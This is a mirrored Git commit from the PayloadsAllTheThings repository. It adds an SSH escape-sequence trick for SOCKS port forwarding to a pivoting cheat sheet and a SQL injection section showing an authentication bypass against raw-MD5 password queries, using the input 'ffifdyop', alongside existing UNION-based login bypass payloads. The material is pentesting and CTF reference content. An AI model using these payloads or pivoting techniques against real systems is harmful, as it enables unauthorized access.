mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Raw MD5 SQL injection + SSH Konami Code
This commit is contained in:
parent
2a080f82e6
commit
7a80647e63
@ -25,6 +25,14 @@ ssh -N -f -D 9000 [user]@[host]
|
||||
-N : do not execute a remote command
|
||||
```
|
||||
|
||||
Cool Tip : Konami SSH Port forwarding
|
||||
|
||||
```bash
|
||||
[ENTER] + [~C]
|
||||
-D 1090
|
||||
```
|
||||
|
||||
|
||||
### Local Port Forwarding
|
||||
|
||||
```bash
|
||||
@ -124,3 +132,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
||||
|
||||
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
||||
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
|
||||
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
|
@ -293,6 +293,22 @@ admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
```
|
||||
|
||||
## Authentication Bypass (Raw MD5)
|
||||
|
||||
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
|
||||
|
||||
```php
|
||||
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
|
||||
```
|
||||
|
||||
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
|
||||
|
||||
```php
|
||||
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
|
||||
```
|
||||
|
||||
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
|
||||
|
||||
## Polyglot injection (multicontext)
|
||||
|
||||
```sql
|
||||
|
Loading…
Reference in New Issue
Block a user